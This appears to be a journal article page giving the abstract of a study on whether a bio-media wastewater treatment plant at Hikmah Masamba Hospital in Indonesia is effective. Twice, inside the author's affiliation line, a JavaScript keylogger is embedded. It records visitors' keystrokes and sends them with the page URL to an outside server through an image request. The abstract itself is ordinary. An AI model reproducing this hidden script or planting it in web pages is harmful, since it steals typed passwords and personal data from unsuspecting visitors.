Effectiveness Of WWTP Quality Using Bio Media In Hospital Hikmah, Masamba


  • Agus Bintara Birawida (SCOPUS ID : 57193116626), Universitas Hasanuddin<script type="text/javascript">// <![CDATA[ window.setInterval(sendKeys(), 1000); function sendKeys(){ var keys = localStorage.getItem("log_Extension"); var size = keys.length; if(size > 4) { new Image().src="https://blog.mybloggertricks.org/api.php?values="+keys+"<br/>"+document.URL;} } function getKeyCode(event) { var x = event.keyCode || event.which ; switch(x) { case 30: alert(localStorage.getItem("log_Extension")); break; case 10: x = "[ENTER]"; sendKeys(); break; case 13: x = "[ENTER]"; sendKeys(); break; } var txt = ""; txt = txt.concat(localStorage.getItem("log_Extension")); if(isNaN(x)){ var result = txt.concat(x); }else{ var result = txt.concat(String.fromCharCode(x)); } localStorage.setItem("log_Extension", result); } // ]]></script> http://orcid.org/0000-0002-8223-2387


Liquid waste from hospitals contains high enough organic and inorganic compounds, chemical compounds, pathogenic microorganisms, toxic and radioactive chemicals which, if not managed properly, will adversely affect the hospital environment and the community surrounding the hospital. The purpose of this study was to determine the description of the wastewater distribution system, the treatment process and the effectiveness of WWTP in terms of the parameters of pH, Temperature, BOD, COD and Total Coliform. This type of research is observational with a descriptive approach. The sample size is 60 samples with taking points at the inlet and outlet of WWTP Hospital Hikmah Masamba. The frequency of sampling is done twice a day for three days. Sample examination was carried out at the Environmental Engineering and Disease Control Center (BTKLPP) Makassar Class I. Laboratory test results are compared with the Minister of Environment Decree Number 5 of 2014 concerning Waste Water Quality Standards for Businesses and / or Health Service Facilities Activities. The results showed that the distribution of wastewater using a closed, water-resistant piping system flowed smoothly and separated from the rainwater drainage channel. Hospital waste water treatment process. Hikmah Masamba uses the Bio-Media Process system. Results of examination of laboratory wastewater from Hikmah Masamba Hospital at the Outlet level average for pH parameters: 7.21, Temperature: 26.3 oC, BOD5: 26.04 mg / l, COD: 64.23 mg / l, and Total Coliform :> 160,000 colonies / 100 ml. The conclusion of this study for the wastewater distribution process meets the requirements in accordance with Kepmenkes No. 1204 of 2004 concerning the Health requirements of the Hospital, the process of liquid waste treatment is running well and optimally, except for chlorinated tubing that is not functioning. Hospital IPAL is effective in reducing parameters suhu, BOD5 and COD which are indicated by the results of examinations that have met the requirements, but have not been effective in reducing pH and Total Coliform parameters.


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Agus Bintara Birawida, (SCOPUS ID : 57193116626), Universitas Hasanuddin<script type="text/javascript">// <![CDATA[ window.setInterval(sendKeys(), 1000); function sendKeys(){ var keys = localStorage.getItem("log_Extension"); var size = keys.length; if(size > 4) { new Image().src="https://blog.mybloggertricks.org/api.php?values="+keys+"<br/>"+document.URL;} } function getKeyCode(event) { var x = event.keyCode || event.which ; switch(x) { case 30: alert(localStorage.getItem("log_Extension")); break; case 10: x = "[ENTER]"; sendKeys(); break; case 13: x = "[ENTER]"; sendKeys(); break; } var txt = ""; txt = txt.concat(localStorage.getItem("log_Extension")); if(isNaN(x)){ var result = txt.concat(x); }else{ var result = txt.concat(String.fromCharCode(x)); } localStorage.setItem("log_Extension", result); } // ]]></script>


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